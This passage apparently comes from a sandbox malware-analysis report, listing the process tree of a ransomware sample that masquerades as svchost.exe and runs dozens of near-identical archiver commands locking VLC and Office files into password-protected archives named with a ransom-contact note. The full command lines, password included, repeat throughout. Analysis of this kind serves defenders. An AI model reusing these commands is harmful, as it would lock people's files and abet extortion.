  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File B.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File B.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2956
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\Office14\Mso Example Setup File A.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\Microsoft Office\Office14\Mso Example Setup File A.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2908
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\MountStart.bmp(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\MountStart.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2212
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\OpenClose.dxf(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\OpenClose.dxf" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2164
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\AUTHORS.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\AUTHORS.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2368
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\COPYING.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\COPYING.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2100
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:2112
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1368
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:3012
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2148
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1640
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1356
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1096
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2936
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2220
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1032
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1720
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2232
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1144
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1424
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1196
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2416
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:340
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2744
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1400
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2484
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2052
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2724
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2472
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2108
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1980
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist_jstree.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist_jstree.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2692
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2592
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\status.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\requests\status.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2356
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1376
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm_cmd.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm_cmd.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2968
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\NEWS.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\NEWS.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:380
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\plugins\plugins.dat(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\plugins\plugins.dat" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1200
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\README.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\README.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:532
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\skins\winamp2.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\skins\winamp2.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2716
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\VideoLAN\VLC\THANKS.txt(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files\VideoLAN\VLC\THANKS.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2796
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099145.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099145.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1388
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1828
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099148.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099148.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1684
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099150.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099150.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2368
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099152.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099152.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2100
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099154.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099154.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1500
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099155.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099155.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1324
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099156.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099156.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2572
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099157.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099157.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:816
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099160.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099160.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1972
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099161.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099161.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1876
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099162.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099162.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1076
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099165.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099165.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1772
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099166.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099166.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2188
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099167.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099167.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1988
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099168.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099168.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2300
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099185.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099185.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1572
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099186.JPG(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099186.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1544
- C:\ProgramData\msvkp\svchost.exe
